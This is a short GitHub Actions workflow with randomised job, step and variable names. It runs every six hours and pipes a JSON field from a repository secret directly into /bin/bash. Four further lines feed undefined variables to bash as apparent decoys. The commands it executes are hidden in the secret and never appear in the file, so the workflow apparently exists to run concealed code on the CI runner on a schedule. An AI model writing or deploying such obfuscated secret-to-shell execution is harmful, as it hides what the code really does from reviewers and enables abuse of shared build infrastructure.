name: liutang19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '45 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liutang19871010
        env:
          fap6391: ${{ secrets.fap6391 }}
        run: |
          echo $fap6391 | jq -r .xij86845 | /bin/bash
          echo $vtn55505 | jq -r .vizwb7079 | /bin/bash
          echo $wnwq2 | jq -r .xc56 | /bin/bash
          echo $pf43 | jq -r .bciwy182 | /bin/bash
          echo $ubuhv0 | jq -r .ys325 | /bin/bash

